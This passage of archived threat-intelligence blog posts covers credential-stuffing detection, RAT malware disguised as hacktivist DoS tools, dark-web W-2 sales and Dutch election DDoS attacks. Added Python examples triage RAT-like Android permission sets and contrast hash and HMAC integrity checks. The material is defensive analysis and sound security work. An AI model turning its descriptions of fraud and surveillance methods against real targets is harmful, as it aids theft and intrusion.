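Keying on the source IP is the simplest version; tools of the SentryMBA type routinely rotate through proxy lists, so a production rule would also aggregate by user-agent fingerprint or by the ratio of distinct usernames to distinct IPs across the whole site, and would treat any success inside a flagged window as a confirmed account takeover rather than a login.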

    3. Private and Confidential Documents

    Documents marked as sensitive are inadvertently leaked by partners and employees. As well as opening organizations up to corporate espionage, this allows attackers to weaponize legitimate-looking documents and launch targeted attacks.

    4. Intellectual Property

    Intellectual property is freely available and shared online, inadvertently and by malicious actors. This can leave organizations vulnerable to corporate espionage. But if an organization is aware that a new design, for example, has been leaked early, they can get it removed and mitigate accordingly.

    5. Social Media Over-Sharing

    Employees reveal information about security procedures, software and hardware. This information can be used by attackers as they perform reconnaissance on an organization, seeking out specific software to exploit.


    Figure 2: A company tweet that inadvertently shares the company wifi password

    6. Personally Identifiable Information (PII)

    Organizations and their supply chain may be inadvertently exposing customer PII. This information can have a compliance impact, given the recent EU General Data Protection Regulation (GDPR).

    This information leaves organizations vulnerable to corporate espionage and competitive intelligence. Worse still, criminals and hostile groups can exploit this leaked data to find the organization’s weak points and launch targeted cyber-attacks. By monitoring for this leakage, organizations can gain an awareness of where they are exposed and remediate.

    To learn more, check out our web page on digital risk management, or check out our 1 pager below.



    The 3 Pillars of Digital Risk Management: Part 1 Understanding Cyber Threats Thu, 13 Apr 2017 16:24:28 +0000 What is Digital Risk Management?

    The National Institute of Standards and Technology (NIST) defines the field of risk management as: “The process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level.” Applied to cyber security, we can define the field of external digital risk management as:

    “The process of identifying, assessing, and taking steps to reduce external digital risk to an acceptable level. External digital risk management considers: 1) cyber threats 2) data leakage and 3) reputation risks.”

    In this 3-part blog series, we will discuss how each of these pillars contributes to Digital Risk Management. Let’s begin with Cyber Threat.

    The concept of “threat” can refer to a range of things; it may be an action, a threat actor or a new tool. Here are the four main areas we define:

    1. Indications and warnings

    Leverage threat intelligence to get advance information regarding an adversary’s planned activities. This can include being named on a hacktivist target list or being discussed on a known criminal forum.


    Figure 1: A target list posted as part of OpIcarus’ Phase 4

     2. Actor profiles

    Profile actors’ tactics, techniques, and procedures (TTPs) in order to better understand how an attacker might target you and what tools they are likely to use. This can be used to stack up an organization’s defenses to the threats they are likely to face.


    Figure 2: A profile of the threat actor “Turk Hack Team”

    3. Campaign profiles

    Understand the threat actor’s tools, target geographies and target industries. This can include the examination of malcode or the analysis of a new phase in a hacktivist campaign. This allows organizations to be better prepared for developing threats.

    4. Emerging tools

    Track new tools being developed and shared on the dark web and criminal forums. This can include the inclusion of new CVEs in an exploit kit, which can help to prioritize patching procedures.


    Figure 3: The release of Blaze Exploit Kit alongside the claimed vulnerabilities it exploits

    The value of threat intelligence is directly proportional to how tailored it is to an organization. For external digital risk management to be effective, a threat intelligence doctrine should be applied. In applying the intelligence doctrine to the concept of cyber threat, organizations can methodically understand what they care about, create collection plans, identify collection gaps and ultimately deliver tailored intelligence.

    To learn more, check out our 1 pager below or check out our Digital Risk Management web page.

    To get the latest in digital risk management, subscribe to our digital risk management emails here.



    All Sources Are Not the Same; Why Diversity Is Good for Intelligence Tue, 11 Apr 2017 16:19:21 +0000 As we all know, if you listen to just one side of the story, very often you don’t get the full picture. As any parent will know, you sometimes get truths, half-truths and sometimes even outright lies. A discerning guardian, however, will be able to piece all these disparate bits of information together, work out which ones don’t make sense and which ones do before taking action.

    This is true of intelligence analysis also: relying on single sources, or placing too much emphasis on one source, may lead to biased or inaccurate assessments. Take, for example, the numerous headlines of “Jihadi” involvement that followed the TalkTalk data breach in October 2015, which apparently stemmed from a single Pastebin post of unknown provenance. The reality of the episode, now a matter of public record, is somewhat different: a 17-year-old boy admitted hacking offences in November last year, claiming he was “just showing off” to friends.

    While some single-source reporting is sufficient to meet a narrowly defined tactical need, in-depth intelligence analysis that seeks to address more complex operational or strategic intelligence requirements requires fused intelligence from multiple and diverse sources. At Digital Shadows, the foundation of our in-depth intelligence is collection and analysis from multiple sources, followed by a peer review cycle by a diverse team. This helps us identify and mitigate common analytical pitfalls such as confirmation bias, groupthink, cognitive dissonance and cultural misapprehensions.

    Drawing from multiple sources allows intelligence analysts to maximize the strengths and minimize weaknesses of different intelligence disciplines, as well as challenge or corroborate findings. Just as children lie to their parents, threat actors regularly seek to subvert the truth as a core aspect of their operations. Hacktivists exaggerate their capability and impact, criminals scam fellow criminals and state actors lay false trails to confuse investigators – in plain terms: lying is the norm.

    Digital Shadows analysts also use Structured Analytic Techniques such as Strengths, Weaknesses, Opportunities and Threats (SWOT) analysis, paired comparison or the Analysis of Competing Hypotheses (ACH; see Figure 1) in an attempt to remove bias and focus on the evidence at hand.


    Figure 1: An example of an ACH produced by Digital Shadows, read more here

    Part of the intelligence analyst’s job is to tease apart disparate sources, evaluate their reliability based on previous reporting and understand the quality of the information that they provide. At Digital Shadows, as part of our service, we provide customers with intelligence products that incorporate multi-source intelligence, from open-sources, the deep and dark web, social media and technical intelligence. We do this to ensure the rigour of our products and challenge information that we acquire from other sources.

    Monitoring the Mobile Threat Landscape Tue, 04 Apr 2017 16:28:36 +0000 The UK’s National Cyber Security Centre (NCSC) and the National Crime Agency (NCA) released a joint paper on the cyber threats to UK businesses on March 14th. This paper can be seen as an authoritative voice with regards to the “state of the nation” and cyber threats to UK corporations.


    While much of the media response to the paper focused on the part of the document discussing threats from ransomware and connected devices, another section examined the emerging threat from malicious mobile applications. The paper assessed that, at the time of writing, there had been no reported cases of mobile malware being used to pivot into a corporate enterprise network, but that it is a growing threat and that attacks involving mobile malware have increased in volume and sophistication. The increasing speed, power and storage capabilities of mobile devices mean they are used more frequently for activities previously conducted on other platforms, such as laptops or PCs. Mobile devices are therefore considered highly lucrative and viable targets by threat actors.

    Three prominent trends were identified in the cyber threat report:

    • Malicious applications which distribute malware often request elevated privileges and permissions in order to conduct further infections. The types of malware detected to date have included information stealers and ransomware. In January 2017 a ransomware variant called Charger was identified bundled with an information stealer, masquerading as a battery-saving app available for download from the Google Play store. The app has since been removed from the store.
    • Fake applications which mimic brands and trick users into downloading the malicious version. These were involved in stealing personal or confidential information such as credentials. In February 2017 a trojan downloader was identified masquerading as an Adobe Flash Player app targeting all Android operating systems, seeking to infect users with banking malware that steals customers’ login credentials.
    • SMS phishing (aka SMishing) uses the same techniques as traditional phishing to persuade the user to disclose personal information, download a file or app, or visit a malicious site. Various bank and retail customers have been targeted in SMishing attacks, often involving an alert warning the customer of suspicious activity on their account and requesting confirmation of their credentials, or offering access to exclusive vouchers and discount codes. Successful attacks resulted in the compromise of customers’ personal and financial information.

    In recognition of the growing nature of mobile threats, Digital Shadows has recently extended its SearchLight digital risk management service to focus on Mobile Application Monitoring. The wide range of threats detected includes:

    • Suspect application behavior and code, such as self-signed certificates or the presence of malware;
    • Versions of an application that have been modified by a third party;
    • Copies of application on stores that are not actively managed;
    • Impersonations or spoof applications that mimic brands and affiliate links that mislead or confuse users.

    By identifying these threats, organizations can protect themselves from potential theft of intellectual property, mitigate brand misuse and prevent subsequent reputational damage. Organizations without mobile applications or SMS communication are still considered to be at risk of threat actors developing malicious and illegitimate applications in their name, or targeting their customers with SMishing attacks.

    To mitigate this threat it is important to improve education around mobile application risks: purchasing from third-party stores, downloading cracked versions of applications, and granting requests for intrusive permissions and privileges all increase the risk to end users. Organizations should also ensure that device operating systems are kept up to date, which helps prevent the exploitation of known vulnerabilities by threat actors.

    Mobile devices and applications have been described as the “new battleground” in digital risk and security. Therefore, all mobile users should benefit from knowing what threats are lurking over the horizon.

    OpIsrael Hacktivists Targeted By Unknown Threat Actor Thu, 30 Mar 2017 12:33:37 +0000 Ideologically-motivated “hacktivist” actors can present a variety of threats to organizations from defacements, to denial of service attacks and sometimes even data compromise. Our analysts recently observed hacktivist actors themselves being targeted with malware.

    We recently identified evidence indicative of a malware distribution campaign apparently intended to deploy remote access trojans (RAT) onto the machines of hacktivist actors engaged in supporting the 2017 iteration of OpIsrael. This yearly hacktivist campaign targets Israeli entities on April 7th. While monitoring for activity relating to OpIsrael, Digital Shadows identified a Twitter account sharing links to what were claimed to be two denial of service (DoS) tools – one for Windows and one for Android devices. The tweets encouraged users to download these tools in order to participate in OpIsrael and featured multiple hashtags used by this campaign, as well as Anonymous collective imagery.


    Figure 1 – Tweet linking to purported “DDoS tools”. Details obfuscated for safety.

    The Android app file (APK) for the purported Android tool was hosted on the file sharing site Sendspace, but the Windows tool was hosted on a page on what appeared to be a compromised website. This page featured further incitements to participate in OpIsrael and claimed to have been posted by Anonymous RedCult, an Anonymous affiliated group which on March 3, 2017 posted a video to YouTube declaring the intention to target Israeli Government sites in support of OpIsrael.


    Figure 2 – Purported “DDoS” tool download page.

    Hacktivists seeking to whip up support for an upcoming operation will often share tools to be used by prospective supporters. Digital Shadows observed similar posts while tracking OpIcarus, an operation targeting financial institutions throughout 2016.

    However, in this case all was not as it seemed. When we downloaded and examined the files, we discovered that the purported Windows DoS tool was highly likely a version of the well-known Dark Comet RAT. Similarly, the claimed Android DoS tool was highly likely an Android RAT which, after being installed, elevated its permissions to obtain access to the infected device’s camera, SMS messages, microphone, browser, call logs and physical location via GPS. At the time of analysis, neither of these samples had previously been documented on malware analysis sites.
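A quick static check catches the mismatch described above before any dynamic analysis: an app that claims to be a network flooding tool has no reason to request the camera, SMS, microphone, call log or location permissions the Android RAT obtained. The block below is an added example written for this page, not the analysis tooling used by Digital Shadows. It parses a decoded AndroidManifest.xml (in practice obtained from the APK with a decoder such as apktool) and compares the requested permissions with what the claimed purpose would need; both manifests and the "expected for a network tool" set are constructed for the demonstration.

```python
"""Static triage of an Android package's manifest: does the permission set match
what the app claims to be?  A 'DoS tool' has no business reading SMS or the call
log.  Added example; the manifests below are constructed, and in practice the
manifest would first be decoded from the APK with a tool such as apktool."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permission -> capability it grants (subset relevant to the RAT behaviour described)
SURVEILLANCE_PERMISSIONS = {
    "android.permission.CAMERA": "camera",
    "android.permission.READ_SMS": "SMS",
    "android.permission.RECEIVE_SMS": "SMS",
    "android.permission.SEND_SMS": "SMS",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.READ_CALL_LOG": "call logs",
    "android.permission.ACCESS_FINE_LOCATION": "GPS location",
    "com.android.browser.permission.READ_HISTORY_BOOKMARKS": "browser history",
}
# What a network flooding tool could plausibly need (assumption for the demo)
EXPECTED_FOR_NETWORK_TOOL = {"android.permission.INTERNET", "android.permission.ACCESS_NETWORK_STATE"}

# Constructed manifests: one as a RAT disguised as a DoS tool would look, one benign
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.dostool">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="DoS Tool"/>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.dostool">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <application android:label="DoS Tool"/>
</manifest>"""


def requested_permissions(manifest_xml):
    """Set of permission names declared in <uses-permission android:name=...> elements."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}


def triage(manifest_xml, expected=EXPECTED_FOR_NETWORK_TOOL):
    """Compare requested permissions with the claimed purpose. Returns the
    permissions outside the expected set, the surveillance capabilities they
    confer, and a verdict."""
    perms = requested_permissions(manifest_xml)
    capabilities = sorted({SURVEILLANCE_PERMISSIONS[p] for p in perms if p in SURVEILLANCE_PERMISSIONS})
    return {
        "unexpected": sorted(perms - expected),
        "surveillance_capabilities": capabilities,
        "verdict": "suspicious: RAT-like permission set" if capabilities else "consistent with claimed purpose",
    }


if __name__ == "__main__":
    for label, manifest in (("suspicious", SUSPICIOUS_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(label, triage(manifest))
```

Permissions declared in the manifest are an upper bound on what the app can do, not proof that it does it, so a hit here is a reason to run the sample, not a conviction. Conversely, an app that requests RECEIVE_BOOT_COMPLETED alongside surveillance permissions is signalling persistence, which is exactly the profile a RAT needs.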

    Assessment and outlook

    These findings suggest that the actors responsible for these tweets sought to use Anonymous collective imagery and hashtags to socially engineer supporters of OpIsrael into compromising their own machines. While the nature and objectives of the actor(s) responsible for this campaign are not known, opposing pro-Israel campaigns such as OpIslam often emerge to counter OpIsrael.

    Therefore while it is possible that this distribution campaign was the work of an opportunistic criminal actor, we also assessed it to be plausible that it was part of an attempt by pro-Israeli actors to compromise the machines of OpIsrael participants. If this is the case, it would indicate the possibility that the actors responsible for this distribution campaign might use it to act against OpIsrael participants prior to April 7th. It remains to be seen whether evidence of such targeting will emerge.

    Turk Hack Team and the “Netherlands Operation” Wed, 29 Mar 2017 10:03:48 +0000 Since mid-March, Turk Hack Team have been participating in a new campaign called “Netherlands Operation”, announced via their official Twitter feed. This account also published claims that 252 Dutch-based websites had been defaced, alongside alleged screenshots of the defaced websites.

    Figure 1: Image tweeted from the Twitter account associated with Turk Hack Team. Translation: Turk Hack Team presents… Netherlands Operation. All Turk Hack Team members are invited…

    Turk Hack Team have targeted websites and groups whom they judge to have disrespected or otherwise slighted the state of Turkey since 2013. The group consists of patriotic hackers who most often engage in website defacement. The majority of the group’s activity is in the Turkish language, and previous attacks indicate a strong bias towards supporting the Turkish state and Turkey’s controversial president Recep Tayyip Erdoğan. Most notably, the group claimed credit for a distributed denial of service (DDoS) attack against the US Library of Congress in July 2016, motivated by a perception that the US government had played a role in instigating an attempted coup.

    Since the announcement of the campaign, Digital Shadows have detected indications that at least 2,700 websites had been defaced with messages from the group including the terms “TurkHackTeam Netherlands operation” (see Figure 2 for examples of search engine listings showing defacement messages on several websites). Most of the affected websites used the Dutch and German top-level domains. In addition to the website defacements, Digital Shadows also found claims of data dumps for other Dutch websites, including healthcare and government entities, among others. A dedicated forum for the group also contained posts related to the campaign.


    Figure 2 Examples of defacement messages

    Turk Hack Team is not the only group actively targeting Dutch-based entities. On March 13, 2017, several Dutch and English-language media outlets reported that “hundreds” of websites had been defaced by the threat group “PrivateHackers”. In these instances, the actors reportedly compromised two servers owned by Netherlands-based hosting company Versio, allowing defacement messages to be placed on websites hosted on those servers. It remains unknown, however, how Turk Hack Team was able to gain access to the over 2,700 Dutch websites.

    Ongoing Geopolitics between Turkey and the Netherlands

    Many of the defacements made by Turk Hack Team carry nationalist messages and criticize the Netherlands for recent political actions affecting Turkish ministers. As highlighted in the timeline below, tensions have risen between the two countries over the last three months, but the source of the issue can be traced back to the failed Turkish coup attempt in July 2016.

    Following the coup attempt, Turkish President Recep Tayyip Erdogan pushed for an expansion of his executive powers. On January 9, 2017, the Turkish parliament passed a bill calling for a constitutional referendum, to be voted on by the public, to give the president these expanded powers. Since then, support for a ‘yes’ vote has been promoted across Turkey by the Erdogan government. Erdogan’s efforts have extended beyond Turkey’s borders, and he has attempted to garner favor with Turkish expatriates in Europe. Citing security reasons, officials in Germany blocked Turkish ministers from entering several German towns between February 27 and March 3, 2017. On March 11, a Turkish minister was blocked from entering Rotterdam in the Netherlands. Both incidents prompted responses from Erdogan, who claimed Germany was using “Nazi practices” and threatened that the Netherlands would “pay the price” for blocking the minister. These events have apparently catalyzed the hacktivist response amongst patriotic groups (see Figure 3 for a timeline of significant events).


    Figure 3 Timeline of geopolitical escalation and hacktivist activities in 2017

    Referendum vote approaches

    Some of the Turkish attacks have coincided with the Dutch election which took place on March 15. We have also seen evidence of retaliation from Dutch-based actors in the form of an attempted doxing of the Turkish actors responsible for the Versio defacements mentioned above, although nothing on the scale of the activity from the Turkish actors has been observed. As the referendum vote scheduled for April 16 approaches, we anticipate further activity from Turk Hack Team as well as other pro-Turkey threat actors.

    Tax Fraud in 2017
    Mon, 27 Mar 2017 09:18:56 +0000

    The IRS recently released an alert warning tax professionals and taxpayers to be wary of last-minute email scams. With April 18 looming, how concerned should individuals and businesses be about tax fraud?

    On January 31, 2017, the Treasury Inspector General for Tax Administration published its report “Results of the 2016 Filing Season”, which showed a reduction in the number of fraudulent tax returns identified between 2013 and 2015. At the same time, however, the IRS reported a “400 percent surge in phishing and malware incidents in the 2016 tax season”, showing that cybercriminals continued tax-related fraud activity. The number of identified fraudulent returns was therefore not indicative of the overall level of tax fraud occurring.

    The tax season represents a potentially lucrative time for cybercriminals. We have detected numerous instances of actors requesting and selling items pertaining to tax fraud across criminal sites on both the open and dark web.

    Although there is evidence of an increased volume of phrases associated with tax fraud, and of tax-fraud-related items for sale on criminal sites, this must be placed in the context of increased user awareness and the expansion of the IRS’s efforts to prevent fraudulent tax returns.

    Assessing dark web and criminal chatter

    In order to gauge the interest in tax fraud in 2017, Digital Shadows assessed mentions of keywords detected across known criminal and dark web sites. The frequency of these terms is shown in figures 1 and 2. The number of mentions in 2017 so far is already over 40 percent of the 2016 total.


    Figure 1: Mentions of keywords associated with tax fraud detected by SearchLight across dark web and criminal sites, distributed by year


    Figure 2: Mentions of keywords associated with tax fraud detected by SearchLight across dark web and criminal sites, distributed by the most popular phrases per year.


    Items for sale on criminal and dark web sites

    On February 16, 2017, the user ‘innermind’ requested W-2 forms in bulk on the AlphaBay forum. The user requested approximately 500 forms and was willing to pay $4 USD per form.


    Figure 3: A post on AlphaBay from February 16, 2017

    In another instance, a user named ‘Telepath’ on CrdClub offered loan application files from a mortgage lender’s database in California. The database contained tax forms such as W-2 information, and the actor explicitly noted that the data could be used for tax returns. He offered each set at $15 USD.


    Figure 4: A post on CrdClub from September 2016  

    The user ‘mwenish’ on Carding Forum posted an advert for “w2 fulls” on an unknown date. He offered each set for $5 USD, with a bulk price of $100 USD for 30. The user received one response asking for more information.


    Figure 5: A post offering tax refund full details on Carding Forum, Date unknown.

    Figure 6 shows the vendor Medon on the Hansa marketplace offering W-2 forms he claimed were “fresh from company” on an unknown date. The listing showed 996 forms in stock at a price of $10 USD per item.


    Figure 6: User selling W-2 forms on Hansa marketplace. Date unknown.


    The tax season provides added opportunity for cybercriminals and it is no surprise that we have detected illicit items for sale. We have also observed a slight increase in the level of tax fraud terms in 2017. Organizations should be aware that personal information and employee tax forms hold great value for threat actors, with personal information commonly sold on criminal marketplaces.

    However, this should be placed in the context of the IRS’s expansion of its processes to prevent fraudulent tax returns from entering the tax processing system, and of a greater emphasis on user awareness. By continuing to raise user awareness of phishing campaigns targeting this sort of information, individuals and businesses can better understand the risk posed during tax season. The IRS provides some great resources for understanding the latest techniques used by attackers, which you can access here or by following @irstaxpros on Twitter.

    Dutch Elections – Looking Back at Cyber Activity
    Tue, 21 Mar 2017 09:49:01 +0000

    Last week, I wrote about the potential threats to the Dutch national election. But what actually happened?

    On 14 March 2017, the day before the Dutch General Elections, the websites StemWijzer and KiesCompas suffered DDoS attacks. These websites are popular during the General Elections in the Netherlands, as they give advice to users on which party to vote for by conducting a survey and ‘matching’ the user to the most compatible party. Both StemWijzer and KiesCompas publicly announced their service interruptions as they happened. Servers for both sites were rendered offline for a short time in the afternoon, and for a longer period later that evening. During the night, the sites allegedly received help from Google’s Project Shield to get back online. While additional servers had been prepared for the domains in anticipation of last-minute traffic before the elections on March 15, they could not handle the DDoS attacks.


    [Translation: Our website has unfortunately just been hit by a DDoS attack. Our priority is to get StemWijzer back online a.s.a.p.]


    [Translation: Kiescompas is offline after multiple DDoS attacks. We are working hard to get the site back online.]

    At the time of writing, both sites were online and no party had claimed the attacks. Yet what did whoever was behind the attacks aim to achieve by rendering these sites offline?

    Although the attacks have not been claimed, it is widely speculated that the sites were taken offline by actors loyal to the Turkish state. A cybercrime expert at Fox-IT stated that while the sites were not taken down until Tuesday, DDoS attacks had been launched as early as Saturday night. This was around the same time as the diplomatic conflict between the Dutch and Turkish states started. Cyberattacks persisted until the day of the elections. Given the persistence of the DDoS attacks against KiesCompas and StemWijzer, there have surprisingly been no reports of successful or attempted cyberattacks against the sites of Dutch political parties, or against any site of the Dutch government.

    As the media speculate about the origin of the attacks against StemWijzer and KiesCompas, the Russian threat has not once been put forward as a possible culprit. While initially nobody attributed the attacks to any known party, later suggestions have consistently pointed to actors sympathetic to Turkey.


     Screenshot from Zondag met Lubach, which aired on 19 March 2017. 

    The Damage

    Though the story of StemWijzer and KiesCompas going offline made headlines everywhere in the Netherlands, the damage appears to have been limited. The sites went offline for a short time during the 24 hours leading up to the elections, and while some voters were still undecided, other websites remained available to give voting advice.

    Official voting results will be announced on 21 March 2017, but most of the announced numbers are unlikely to change. Geert Wilders, perhaps the most famous Dutch politician right now, won significant seats in the House but did not become the majority party. Conversations are currently being held among leaders of various parties in the Dutch House of Representatives to form a coalition, jokingly compared by comedians to the choices made on a dating website. At this stage, then, the fear of cyber disruptions is mostly over, but there is a realistic possibility that cyber espionage could be carried out to gain first-hand information about the internal struggles of the Dutch political system.

    Five Reasons Why Alex Seton, VP of Business and Corporate Development, Joined Digital Shadows
    Tue, 21 Mar 2017 09:45:41 +0000

    What a great feeling to find a company that cuts through today’s noisy and crowded security market to address an area that keeps many folks awake at night. After embarking on a deliberate and meaningful process to better understand and validate the challenges today’s cyber security practitioners face, I came across Digital Shadows.

    Throughout my career, I’ve been fortunate to work with many security practitioners and visionaries; including security analysts, CTOs, CISOs, consultants, and small to large vendors. These folks validated my belief that precise, meaningful data will trump the coolest “next-generation” security tool that only succeeds in triggering yet more meaningless alerts.

    As background, I’ve been in this industry for a decent amount of time. Along the way, I’ve had the opportunity to work for large growth companies, helped to build a contemporary security startup and played my part in its subsequent exit. As part of the journey, and as first-time startup executives, we overcame challenges that were typical of early, unproven companies. During this process, we knew one thing: we wanted to be the best at what we did and to be widely recognized as the leader in product and customer experience. We wanted to bring full fidelity to what was an opaque view of a foe’s activity. And we did it.

    At Digital Shadows, the value proposition and team characteristics are very similar. In fact, I’ve distilled five characteristics:

    1. Completing the story of the security professional. Digital Shadows provides practitioners with the information that was never available to them before.
    2. Unrivalled breadth and depth. The product’s wide range of sources is uniquely combined with in-depth expertise.
    3. Empowers organizations. The solution doesn’t make more work, but it makes analysts and their tools more effective in the battle.
    4. Led by a team of practitioners. The leaders are practitioners who understand the challenges facing the industry.
    5. The right culture. The team understands the need to do the best thing for all and strives for this.

    Former practitioners Alastair Paterson and James Chappell – two incredible individuals who really understand the pain that security analysts and CISOs face every day – have built a real gem buried in the sand. They understand that companies have left a “shadow” in their internet footprint, and the risk posed by cyber threats, data leakage and reputational damage.

    The team wants to be the best at what they do – for the customer, for their employees, and for the investor community. As at my previous startup Solera Networks, where we were the first to deliver network context to the binary event information seen in perimeter-based solutions, Digital Shadows also brings a powerful new set of capabilities to view “outside the firewall” activity that poses a risk to a company’s assets and employees.

    In closing, I’m very excited for our prospects ahead and look forward to what I believe will be another fantastic journey.

    5 Risks Posed By Mobile Applications That SearchLight Helps You Manage
    Tue, 14 Mar 2017 08:41:45 +0000

    Organizations face a wide range of risks online, including cyber threats, data leakage and reputational damage. (You can learn more about digital risk management here.) One source of digital risk is mobile application stores, which is why we’re excited to announce that, as of today, Digital Shadows SearchLight™ now monitors for risks posed by mobile applications.

    Mobile applications are great for communicating with your employees and customers, but they come with added risk. SearchLight™ continually monitors across official and unofficial stores for five mobile apps that can pose a risk to your organization:

    1. Your Apps. Issues within your own apps, such as self-signed certificates or the presence of malware. This includes external and internal applications.
    2. Modified Apps. Versions of your own apps that have been modified by a third party.
    3. Copied Apps. Copies of your own apps on stores where you are not actively managing them.
    4. Impersonating Apps. Impersonating or spoof apps that mimic your branding or identity.
    5. Affiliate Links. Affiliate links to your own apps that may mislead or confuse users.

    For each mobile application, SearchLight analyzes the code to assess what threat it poses to your customers and your organization. If these apps go undetected by your organization, the potential impact can include the theft of customer data, diversion of revenue, brand and reputational damage, and poor customer service.

    Mobile application monitoring is not the only thing that’s being released today; we’ve also released an updated user interface. In 2016, Forrester described SearchLight as the “digital risk dashboard of the future”. We’ve taken that dashboard and made it even better (See Figure 1).

    Figure 1: SearchLight’s updated user interface

    Combined with our existing features, SearchLight’s updated user interface and new mobile application monitoring further improve organizations’ ability to understand the risks they face online. With this improved view of their digital risks, organizations can efficiently focus on the highest priority incidents, keeping their security and reputation intact.

    Check out our web page on Digital Risk Management to learn more.

    Back to the red pencil – Cyber threats to the Dutch elections
    Mon, 13 Mar 2017 08:39:49 +0000

    Over the weekend, media reports surfaced about fears of Russian interference in UK elections, with GCHQ reportedly warning political parties that hackers “steal and leak internal emails or publish private databases of voters’ political views in an attempt to damage the standing of political parties with the public.” A more immediate election takes place on Wednesday March 15, as the Dutch General Election – complete with the controversial Geert Wilders – opens its polling stations. But what are the threats facing this upcoming election?

    There have been real concerns about cyber threats to the Dutch General Elections. According to the 2015 annual report by the Dutch General Intelligence and Security Service (AIVD), Russia, China and Iran have posed significant threats to Dutch security over the past years. According to the security service, part of the cyber espionage has been aimed at obtaining political documents, showing that there has been interest by foreign parties in Dutch affairs. Reports even accuse APT28 and APT29 (Cozy Bear and Fancy Bear), which are suspected Russian state actors, of attempting to compromise Dutch politicians’ emails and social media accounts. These discussions were most prominently featured in the news in January and February of 2017, with only weeks to go to the elections, underlining discussions of how foreign entities might seek to affect the elections.

    Concerns over the Voting Systems

    While the Dutch have been voting with paper and a red pencil for years, the counting of the votes was done electronically. Following recent reports of cyber threats to elections, Dutch news organization RTL published an article claiming that the systems counting the votes are poorly secured. Data from local stations is transferred to thumb drives, which are taken to a local gathering point and from there sent on to one central location.

    The Netherlands did briefly consider using voting machines, before swiftly dismissing the idea in 2009 as they would be too easy to hack. It turns out, according to researcher Sijmen Ruwhof, that the current system was just as poorly constructed. The hash code to decrypt the files with local election results is publicly available through the instruction video by the Dutch Electoral Council. Furthermore, the vote counting software requires a web browser and an unsecured (but local) HTTP connection, which significantly increases the opportunities to exploit vulnerabilities. Ruwhof points to further practices demonstrated in the video for the vote counting software that are generally considered bad practice, such as skipping security checks, sending hash codes at the same time as the protected file, not removing files after they were printed, and generally poor security hygiene (read the full report here). As a result, on February 1st the decision was made that all votes would be counted manually to mitigate any potential for interference.


    Figure 1: A screenshot of an instructional video by the Dutch Electoral Council
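    Of the practices Ruwhof criticises, the one with the clearest cryptographic lesson is shipping the hash code on the same channel as the file it protects. The following is an added example (not code from the Dutch Electoral Council's software or from Ruwhof's report) that models a local result export as a small constructed text file and compares two integrity designs: a plain SHA-256 digest that travels with the file, and an HMAC-SHA256 tag keyed with a secret that is provisioned to the station and the central count out of band. The file layout, the field names and the `simulate` helper are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Constructed stand-in for a polling station's exported result file.  The
# field layout is invented for this example; it is not the real export format.
TALLY = b"station=0123;partyA=412;partyB=377;partyC=98\n"


def export_with_digest(payload: bytes) -> tuple[bytes, str]:
    """Weak design: the file and its plain SHA-256 hex digest travel together
    on the same channel, and nothing in the digest depends on a secret that
    the channel does not also carry."""
    return payload, hashlib.sha256(payload).hexdigest()


def check_digest(payload: bytes, digest: str) -> bool:
    """Receiver-side check for the weak design."""
    return hmac.compare_digest(hashlib.sha256(payload).hexdigest(), digest)


def export_with_mac(payload: bytes, key: bytes) -> tuple[bytes, str]:
    """Hardened design: an HMAC-SHA256 tag whose key never appears on the
    channel that carries the file.  A digital signature would serve the same
    purpose if the stations hold private keys."""
    return payload, hmac.new(key, payload, "sha256").hexdigest()


def check_mac(payload: bytes, tag: str, key: bytes) -> bool:
    """Receiver-side check for the hardened design (constant-time compare)."""
    return hmac.compare_digest(hmac.new(key, payload, "sha256").hexdigest(), tag)


def modify_in_transit(payload: bytes, old: bytes, new: bytes) -> bytes:
    """Model an intermediary on the path (thumb drive handler, HTTP hop) that
    edits one field of the file before it reaches the central count."""
    return payload.replace(old, new)


def simulate(key: bytes = b"") -> dict:
    """Push both designs through the same edit and report whether the
    receiver notices.  Returns booleans so the outcome can be asserted."""
    key = key or secrets.token_bytes(32)   # assumed out-of-band shared key

    # 1. Unkeyed digest shipped alongside the file.  The intermediary can
    #    recompute the digest for the edited file, so the receiver's check passes
    #    and the tampering goes unnoticed.
    file_, _digest = export_with_digest(TALLY)
    altered = modify_in_transit(file_, b"partyA=412", b"partyA=312")
    _, replaced_digest = export_with_digest(altered)
    digest_detects_tamper = not check_digest(altered, replaced_digest)

    # 2. Keyed tag.  Without the key the intermediary cannot produce a matching
    #    tag for the edited file, so the receiver's check fails on the edit.
    file_, tag = export_with_mac(TALLY, key)
    altered = modify_in_transit(file_, b"partyA=412", b"partyA=312")
    mac_detects_tamper = not check_mac(altered, tag, key)

    return {
        "digest_detects_tamper": digest_detects_tamper,   # False
        "mac_detects_tamper": mac_detects_tamper,         # True
        "untampered_mac_ok": check_mac(TALLY, tag, key),  # True
    }


if __name__ == "__main__":
    print(simulate())
```

    The point the simulation makes is that an unkeyed hash only guards against accidental corruption; it gives the central count no way to tell a station's genuine export from one rewritten on the way, because the "proof" can be regenerated by anyone holding the file. Integrity against an active intermediary needs either a key that stays off the transport (the HMAC above) or a signature, and, independently of that, the transport itself should not be plaintext HTTP.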

    Possible Motivations

